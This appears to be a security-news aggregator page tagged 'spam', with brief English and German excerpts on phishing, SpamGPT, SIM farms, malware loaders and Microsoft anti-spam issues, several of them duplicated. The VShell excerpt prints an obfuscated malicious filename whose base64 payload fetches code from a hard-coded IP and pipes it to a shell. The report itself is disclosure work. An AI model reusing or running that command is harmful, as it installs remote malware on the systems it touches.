Tag: spam
-
Neuauflage des Google Newsgroup-Spam?
Ein Blog-Leser hat mich zum 6. Oktober 2025 informiert, dass er in seinem Unternehmensumfeld mit Spam-Mails aus Google Newsgroups geflutet wird, obwohl die Empfängeradressen nicht in der Newsgroup registriert sind. Und ein zweiter Leser hat mich ebenfalls am gleichen Tag … First seen on borncity.com Jump to article: www.borncity.com/blog/2025/10/11/neuauflage-des-google-newsgroup-spam/
-
Attackers Season Spam With a Touch of ‘Salt’
Researchers report an increase in the use of hidden content in spam and malicious email to confuse filters and other security mechanisms. First seen on darkreading.com Jump to article: www.darkreading.com/cyber-risk/attackers-season-spam-touch-salt
-
New Smish: New York Department of Revenue
As I was visiting SmishTank to report the most recent SMish that I had received (an iMessage from a +27 South African telephone number claiming to be from ParkMobile) I noticed there had been many recent submissions from the New York Department of Revenue. SmishTank is operated by Professor Muhammad Lutfor Rahman, a colleague of mine…
-
How attackers poison AI tools and defenses
Cyberattackers are using generative AI to draft polished spam, create malicious code and write persuasive phishing lures. They are also learning how to turn AI systems … First seen on helpnetsecurity.com Jump to article: www.helpnetsecurity.com/2025/09/29/poisoned-ai-prompt/
-
SpamGPT Amps Up Enterprise Email Security Threats
Researchers warn that SpamGPT, an AI-powered spam and phishing toolkit, lowers the barrier for cybercriminals with scalable, evasive email attacks. First seen on securityboulevard.com Jump to article: securityboulevard.com/2025/09/spamgpt-amps-up-enterprise-email-security-threats/
-
‘SIM Farms’ Are a Spam Plague. A Giant One in New York Threatened US Infrastructure, Feds Say
The agency says it found a network of some 300 servers and 100,000 SIM cards”, enough to knock out cell service in the NYC area. Experts say it mirrors facilities typically used for cybercrime. First seen on wired.com Jump to article: www.wired.com/story/sim-farm-new-york-threatened-us-infrastructure-feds-say/
-
Microsoft DCU’s Takedown of RaccoonO365
When I saw the name of the Microsoft Digital Crime Unit’s latest target, “RaccoonO365” I probably reacted to it differently than most. With the help of a friend in Lagos, we’ve been watching the money launderers and things have reached a point that they now refer to what we previously called “Business Email Compromise” or…
-
AI-powered phishing scams now use fake captcha pages to evade detection
The attack playbook: The phishing campaigns follow a familiar playbook at the outset. Victims typically receive spam emails that carry urgent, action-oriented messages such as “Password Reset Required” or “USPS Change of Address Notification”.Clicking on the embedded link doesn’t take the user directly to a credential-stealing site but instead loads what appears to be a…
-
AI-powered phishing scams now use fake captcha pages to evade detection
The attack playbook: The phishing campaigns follow a familiar playbook at the outset. Victims typically receive spam emails that carry urgent, action-oriented messages such as “Password Reset Required” or “USPS Change of Address Notification”.Clicking on the embedded link doesn’t take the user directly to a credential-stealing site but instead loads what appears to be a…
-
New Botnet Exploits Simple DNS Flaws That Leads to Massive Cyber Attack
Cybersecurity researchers have uncovered a sophisticated Russian botnet operation that leveraged DNS misconfigurations and compromised MikroTik routers to deliver malware through massive spam campaigns. The discovery reveals how threat actors exploited simple DNS errors to bypass email security protections and distribute malicious payloads on a global scale. The investigation began in November 2024 when researchers…
-
Cybersecurity Consulting
Tags: attack, cyber, cybersecurity, exploit, phishing, ransomware, spam, supply-chain, threat, zero-dayAs businesses expand digitally, their attack surface grows exponentially. Cyber threats today are no longer limited to viruses or spam emails”, they include ransomware, insider threats, phishing, supply chain attacks, zero-day exploits, and nation-state campaigns. To counter this complexity, organizations need more than tools”, they need expert guidance. This is where cybersecurity consulting comes in.…
-
Anti-spam bug blocks links in Exchange Online, Teams
Microsoft is working to resolve a known issue that causes an anti-spam service to mistakenly block Exchange Online and Microsoft Teams users from opening URLs and quarantine some of their emails. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/microsoft/microsoft-anti-spam-bug-blocks-links-in-exchange-online-teams/
-
Anti-spam bug blocks links in Exchange Online, Teams
Microsoft is working to resolve a known issue that causes an anti-spam service to mistakenly block Exchange Online and Microsoft Teams users from opening URLs and quarantine some of their emails. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/microsoft/microsoft-anti-spam-bug-blocks-links-in-exchange-online-teams/
-
SpamGPT: New AI Email Attack Tool Fueling Massive Phishing Operations
A novel AI-driven email attack toolkit namedSpamGPThas surfaced on underground hacking forums, promising cybercriminals an all-in-one platform for launching large-scale phishing campaigns. Advertised as an “AI-powered spam-as-a-service” solution, SpamGPT automates compromise of email servers, bypasses major spam filters, and offers marketing-style campaign analytics. Security researchers warn that its user-friendly interface and AI-assisted content generation significantly…
-
SpamGPT: New AI Email Attack Tool Fueling Massive Phishing Operations
A novel AI-driven email attack toolkit namedSpamGPThas surfaced on underground hacking forums, promising cybercriminals an all-in-one platform for launching large-scale phishing campaigns. Advertised as an “AI-powered spam-as-a-service” solution, SpamGPT automates compromise of email servers, bypasses major spam filters, and offers marketing-style campaign analytics. Security researchers warn that its user-friendly interface and AI-assisted content generation significantly…
-
SpamGPT: New AI Email Attack Tool Fueling Massive Phishing Operations
A novel AI-driven email attack toolkit namedSpamGPThas surfaced on underground hacking forums, promising cybercriminals an all-in-one platform for launching large-scale phishing campaigns. Advertised as an “AI-powered spam-as-a-service” solution, SpamGPT automates compromise of email servers, bypasses major spam filters, and offers marketing-style campaign analytics. Security researchers warn that its user-friendly interface and AI-assisted content generation significantly…
-
DSGVO-Vorfall bei Hutchison Drei Austria GmbH
Der österreichische Telekommunikationsanbieter Hutchison Drei Austria GmbH hatte wohl einen Datenschutzvorfall. Es waren, auf Grund einer Fehlkonfiguration, persönliche Kundendaten einsehbar. Die Betroffenen werden aktuell wohl per Brief über den Vorfall informiert und vor SPAM-Anrufen gewarnt. Die Hutchison Drei Austria GmbH … First seen on borncity.com Jump to article: www.borncity.com/blog/2025/09/04/dsgvo-vorfall-bei-hutchison-drei-austria-gmbh/
-
Merkwürdige Spam-Mail; Accenture gehackt?
Ein Blog-Leser hat mich vor einigen Tage darauf hingewiesen, dass er eine merkwürdige Spam-Mail bekam, die von einer Accenture-Domain verschickt wurde. Inzwischen ist die Domain nicht mehr erreichbar was die Frage nach dem Hintergrund aufwirft. Beobachtung eines Blog-Lesers Ich … First seen on borncity.com Jump to article: www.borncity.com/blog/2025/08/31/accenture-gehackt-merkwuerdige-phishing-mail/
-
TDL001 – Cybersecurity Explained: Privacy, Threats, and the Future – Chester Wisniewski
Tags: access, ai, attack, backdoor, breach, business, ciso, computer, country, crime, crimes, cyber, cybercrime, cybersecurity, data-breach, defense, detection, edr, email, finance, firewall, gartner, government, guide, hacker, hacking, Hardware, infosec, Internet, jobs, linkedin, mail, malicious, microsoft, military, monitoring, network, password, phishing, phone, privacy, programming, ransomware, risk, russia, scam, skills, software, sophos, spam, sql, strategy, switch, technology, threat, update, virus, vulnerability, wifi, windowsSummary “The Defenders Log” Episode 1 features host David Redekop and guest Chet Wisniewski discussing the dynamic world of cybersecurity. Wisniewski, with decades of experience, traces his journey from early BBS and phone network exploration to becoming a cybersecurity expert. They delve into the evolution of hacking, the emergence of profitable cybercrime like email spam,…
-
Linux Malware Delivered via Malicious RAR Filenames Evades Antivirus Detection
Cybersecurity researchers have shed light on a novel attack chain that employs phishing emails to deliver an open-source backdoor called VShell.The “Linux-specific malware infection chain that starts with a spam email with a malicious RAR archive file,” Trellix researcher Sagar Bade said in a technical write-up.”The payload isn’t hidden inside the file content or a…
-
Microsoft to Restrict Use of OnMicrosoft Domains for Email Sending
Microsoft has announced significant restrictions on the use of default onmicrosoft.com domains for email communication, implementing new throttling measures to combat spam and improve email deliverability across its Microsoft 365 platform. Policy Changes Target Spam Prevention The technology giant will introduce throttling limits that restrict messages sent from onmicrosoft.com domains to just 100 external recipients…
-
Stealth Threat Unpacked: Weaponized RAR Files Deliver VShell Backdoor on Linux Systems
Trellix Advanced Research Center has exposed an infection chain that weaponises nothing more than a filename to compromise Linux hosts. A spam message masquerading as a beauty-product survey offers a small reward and carries a RAR archive, yy.rar. When unpacked, the archive drops a single file whose name is a miniature Bash program: ziliao2.pdf{echo,KGN1cmwgLWZzU0wgLW0xODAgaHR0cDovLzQ3Ljk4LjE5NC42MDo4MDg0L3Nsd3x8d2dldCAtVDE4MCAtcSBodHRwOi8vNDcuOTguMTk0LjYwOjgwODQvc2x3KXxzaCAg}_{base64,-d}_bash The…
-
Hackers Using New QuirkyLoader Malware to Spread Agent Tesla, AsyncRAT and Snake Keylogger
Cybersecurity researchers have disclosed details of a new malware loader called QuirkyLoader that’s being used to deliver via email spam campaigns an array of next-stage payloads ranging from information stealers to remote access trojans since November 2024.Some of the notable malware families distributed using QuirkyLoader include Agent Tesla, AsyncRAT, Formbook, Masslogger, Remcos RAT, First seen…
-
QuirkyLoader: A New Malware Loader Spreading Infostealers and Remote Access Trojans (RATs)
IBM X-Force has tracked QuirkyLoader, a sophisticated loader malware deployed by threat actors to distribute prominent families such as Agent Tesla, AsyncRAT, FormBook, MassLogger, Remcos, Rhadamanthys, and Snake Keylogger. This multi-stage threat initiates through spam emails from legitimate providers or self-hosted servers, attaching malicious archives containing a legitimate executable, an encrypted payload masquerading as a…
-
Random Smishing Text Scams: Why “Do I Know You?” Texts Are Dangerous
In this episode, we discuss a rising scam involving random smishing text messages. Learn how these messages work, why they’re effective, and what you can do to protect yourself. Discover the dangers of replying to vague text messages from unknown numbers and get practical tips on how to block and report spam texts. Stay safe……
-
KnowBe4 erweitert HRM+ um agentische KI-Fähigkeiten
Neu im Portfolio ist außerdem PhishML Insights eine Erweiterung von PhishER+. Diese KI-Funktion hilft Sicherheitsteams, neue Angriffsmuster präziser zu erkennen. Sie können eigene Schwellenwerte für die Klassifizierung von E-Mails festlegen und erhalten nachvollziehbare Erklärungen, warum eine Nachricht als harmlos, Spam oder Bedrohung eingestuft wurde. First seen on infopoint-security.de Jump to article: www.infopoint-security.de/knowbe4-erweitert-hrm-um-agentische-ki-faehigkeiten/a41648/
-
Fake VPN and Spam Blocker Apps Tied to VexTrio Used in Ad Fraud, Subscription Scams
The malicious ad tech purveyor known as VexTrio Viper has been observed developing several malicious apps that have been published on Apple and Google’s official app storefronts under the guise of seemingly useful applications.These apps masquerade as VPNs, device “monitoring” apps, RAM cleaners, dating services, and spam blockers, DNS threat intelligence firm Infoblox said in…
-
Pi-hole Plugin Flaw Exposes Donor Names and Email Addresses in Data Breach
A Pi-hole donor has reported receiving spam email to an address created exclusively for their donation to the popular network-level ad blocker, raising concerns about a potential data breach affecting the project’s donor database. The incident, reported on Reddit’s Pi-hole community forum under investigation status, suggests that donor email addresses may have been compromised or…